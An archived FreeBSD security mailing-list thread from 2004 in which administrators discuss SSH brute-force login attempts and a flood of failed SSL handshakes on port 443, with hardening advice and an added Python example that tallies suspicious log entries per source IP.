Back when the RST semi-blind attacks came out, I double-checked our ICMP
code for the same condition. It turns out that this was fixed by one of
our developers years and years ago. I can't recall the exact version of
the change now, but I believe it occurred around 4.1 or 4.2. So, it could
use some quick review, but I think we're good here.

Mike "Silby" Silbersack

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 18:33:10 2004
Date: Fri, 13 Aug 2004 14:33:04 -0400
From: "Peter C. Lai"
To: Mohacsi Janos
cc: freebsd-security@freebsd.org
In-Reply-To: <20040813160928.M82373@mignon.ki.iif.hu>
Message-ID: <20040813183304.GU346@cowbert.net>
References: <411CCAAE.7020505@beco.hu> <20040813160928.M82373@mignon.ki.iif.hu>
User-Agent: Mutt/1.5.6i
Subject: Re: sequences in the auth.log
X-List-Received-Date: Fri, 13 Aug 2004 18:33:10 -0000

On Fri, Aug 13, 2004 at 04:14:29PM +0200, Mohacsi Janos wrote:
> Hi Sandor,
> You don't have to worry, unless you have user 'test', 'guest',
> 'admin', 'root' with poor password: typically same or very similar to your
> accountname. There seems to be a script around the hackers to scan SSH and
> gain access to poorly configured servers.... Unfortunately there are plenty
> of badly configured servers. Maybe you should disable root access via SSH
> password (only via keys).

Disabling root login via ssh will still cause 'failed password' entries in syslog. (on openssh 3.7 anyway)

--
Peter C. Lai
University of Connecticut Dept. of Molecular and Cell Biology
Yale University School of Medicine SenseLab | Research Assistant
http://cowbert.2y.net/

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 19:19:16 2004
Message-Id: <6.1.2.0.2.20040813130613.02875fd0@mail.ctch.net>
X-Mailer: QUALCOMM Windows Eudora Version 6.1.2.0
Date: Fri, 13 Aug 2004 13:19:12 -0600
To: freebsd-security@freebsd.org
From: Gregory Kuhn
Subject: Re: sequences in the auth.log
X-List-Received-Date: Fri, 13 Aug 2004 19:19:16 -0000

At 11:35 AM 8/13/2004, Craig Edwards wrote:
>ive been getting this too on both my freebsd boxes, it seems to be an
>epidemic. i guess its some form of ssh scanner looking for open accounts
>with no passwords (or easily guessable passwords)?

Just one more reason to mandate strict passwords for any accounts that have interactive shell access. It is also why we don't allow shell accounts to our users, with the exception of a very small few (approximately 5 out of 200), and those users are required to maintain very strict passwords containing uppercase, lowercase, numeric and special characters; the passwords must be changed every 30 days, and they are not allowed to reuse passwords...EVER!

My personal experience with end-users (at least most of them) is that, given the opportunity, the end-user will opt for the easy to remember (a.k.a. easy to guess) password. We have all heard the jokes about the password being "password"; it's no joke...neither are first names, last names and so on...four letter passwords are a favorite of the average end-user too.

lusers...you can't live with them, you can't live without them, you can only try to educate them.

Greg

> >165.21.103.20 port 39836 ssh2
> >Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20
> >Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57
> >Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57
> >
> >What are these?
> >
>
>_______________________________________________
>freebsd-security@freebsd.org mailing list
>http://lists.freebsd.org/mailman/listinfo/freebsd-security
>To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 22:08:10 2004
Message-ID: <411D3BC3.6050402@beco.hu>
Date: Sat, 14 Aug 2004 00:08:03 +0200
From: Sandor Berta
To: freebsd-security@freebsd.org
User-Agent: Mozilla Thunderbird 0.7.1 (Windows/20040626)
Subject: heavy load on port 443
X-List-Received-Date: Fri, 13 Aug 2004 22:08:10 -0000

Hi,

While I was working, the following message flooded the screen.

Aug 13 23:32:28 www /kernel: Limiting closed port RST response from 213 to 200 packets per second

The /var/log/apache_ssl_engine.log started to grow with similar messages:

[13/Aug/2004 23:43:49 66440] [error] SSL handshake failed (server www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows)
[13/Aug/2004 23:43:49 66440] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
[13/Aug/2004 23:43:50 31633] [info] Connection to child 38 established (server www.beco.hu:443, client 217.102.90.240)
[13/Aug/2004 23:43:50 31633] [info] Seeding PRNG with 1160 bytes of entropy
[13/Aug/2004 23:43:51 31633] [error] SSL handshake failed (server www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows)
[13/Aug/2004 23:43:51 31633] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different

I don't have the output of the following command:
netstat -anfinet
but it showed a lot of connections from the above IP on port 443.

Does such an attack have any other effect besides filling up /var/log?

bye
Sandor Berta

From owner-freebsd-security@FreeBSD.ORG Sat Aug 14 01:32:20 2004
Date: Sat, 14 Aug 2004 11:32:04 +1000 (EST)
From: Neo-Vortex
To: Sandor Berta
cc: freebsd-security@freebsd.org
In-Reply-To: <411D3BC3.6050402@beco.hu>
Message-ID: <20040814113142.H79402@Neo-Vortex.Ath.Cx>
References: <411D3BC3.6050402@beco.hu>
Subject: Re: heavy load on port 443
X-List-Received-Date: Sat, 14 Aug 2004 01:32:20 -0000

More than likely someone is portscanning you... that's all...

On Sat, 14 Aug 2004, Sandor Berta wrote:

> Hi,
>
> While I was working, the follwing message flud the screen.
>
> Aug 13 23:32:28 www /kernel: Limiting closed port RST response from 213
> to 200 packets per second
>
> The /var/log/apache_ssl_engine.log started
> to grow with similar messages:
>
> [13/Aug/2004 23:43:49 66440] [error] SSL handshake failed (server
> www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows)
> [13/Aug/2004 23:43:49 66440] [error] OpenSSL: error:1406908F:SSL
> routines:GET_CLIENT_FINISHED:connection id is different
> [13/Aug/2004 23:43:50 31633] [info] Connection to child 38 established
> (server www.beco.hu:443, client 217.102.90.240)
> [13/Aug/2004 23:43:50 31633] [info] Seeding PRNG with 1160 bytes of entropy
> [13/Aug/2004 23:43:51 31633] [error] SSL handshake failed (server
> www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows)
> [13/Aug/2004 23:43:51 31633] [error] OpenSSL: error:1406908F:SSL
> routines:GET_CLIENT_FINISHED:connection id is different
>
> I don't have the output of the following command:
> netstat -anfinet
> but it showed a lot of connection from the above IP. on port 443.
>
> Has any other effect of such attacks beside
> filling the /var/log?
>
> bye
> Sandor Berta

From owner-freebsd-security@FreeBSD.ORG Sat Aug 14 01:32:57 2004
Date: Sat, 14 Aug 2004 11:32:49 +1000 (EST)
From: Neo-Vortex
To: Sandor Berta
cc: freebsd-security@freebsd.org
In-Reply-To: <411D3BC3.6050402@beco.hu>
Message-ID: <20040814113212.U79402@Neo-Vortex.Ath.Cx>
References: <411D3BC3.6050402@beco.hu>
Subject: Re: heavy load on port 443
X-List-Received-Date: Sat, 14 Aug 2004 01:32:57 -0000

Oh, almost forgot, it could also be Nessus or some other security scanner scanning your box too.

On Sat, 14 Aug 2004, Sandor Berta wrote:

> Hi,
>
> While I was working, the follwing message flud the screen.
>
> Aug 13 23:32:28 www /kernel: Limiting closed port RST response from 213
> to 200 packets per second
>
> The /var/log/apache_ssl_engine.log started
> to grow with similar messages:
>
> [...]
>
> I don't have the output of the following command:
> netstat -anfinet
> but it showed a lot of connection from the above IP. on port 443.
>
> Has any other effect of such attacks beside
> filling the /var/log?
>
> bye
> Sandor Berta
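Both threads above come down to the same defender's question: which remote addresses are generating the noise, and how many attempts each has made? The following is an added example, not code from anyone on the list, that triages the two log formats quoted here (sshd "Illegal user" lines from auth.log and the mod_ssl "SSL handshake failed" lines from apache_ssl_engine.log). The sample log lines are constructed from the ones in the thread plus one made-up successful-login line; the function names and the review threshold are the example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample input modelled on the auth.log lines quoted in this
# thread, plus one constructed successful login to show that lines which
# are not "Illegal user" entries are ignored.
AUTH_LOG = """\
Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20
Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57
Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57
Aug 13 14:25:45 www sshd[26489]: Illegal user admin from 202.28.120.57
Aug 13 14:30:02 www sshd[26501]: Accepted publickey for sandor from 10.0.0.5 port 50122 ssh2
"""
# Constructed mod_ssl engine log lines in the format quoted in the port 443 thread.
SSL_LOG = """\
[13/Aug/2004 23:43:49 66440] [error] SSL handshake failed (server www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows)
[13/Aug/2004 23:43:49 66440] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
[13/Aug/2004 23:43:50 31633] [info] Connection to child 38 established (server www.beco.hu:443, client 217.102.90.240)
[13/Aug/2004 23:43:51 31633] [error] SSL handshake failed (server www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows)
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
ILLEGAL_USER = re.compile(r"sshd\[\d+\]: Illegal user (\S+) from " + IPV4)
SSL_FAIL = re.compile(r"SSL handshake failed \(server \S+, client " + IPV4 + r"\)")

def ssh_probes_by_source(text):
    """Map each source IP to the usernames it tried, in order of appearance."""
    probes = defaultdict(list)
    for line in text.splitlines():
        m = ILLEGAL_USER.search(line)
        if m:
            probes[m.group(2)].append(m.group(1))
    return dict(probes)

def ssl_failures_by_client(text):
    """Count failed TLS handshakes per client IP; the OpenSSL detail lines are skipped."""
    failures = defaultdict(int)
    for line in text.splitlines():
        m = SSL_FAIL.search(line)
        if m:
            failures[m.group(1)] += 1
    return dict(failures)

def sources_to_review(counts, threshold):
    """Return the sources whose event count reaches threshold, busiest first."""
    return sorted((ip for ip, n in counts.items() if n >= threshold),
                  key=lambda ip: (-counts[ip], ip))
```

With the sample data, `sources_to_review({ip: len(u) for ip, u in ssh_probes_by_source(AUTH_LOG).items()}, 2)` returns `['202.28.120.57']` and `sources_to_review(ssl_failures_by_client(SSL_LOG), 2)` returns `['217.102.90.240']`; in practice the threshold is tuned against the host's normal failure rate before the list is fed to a firewall or alerting rule.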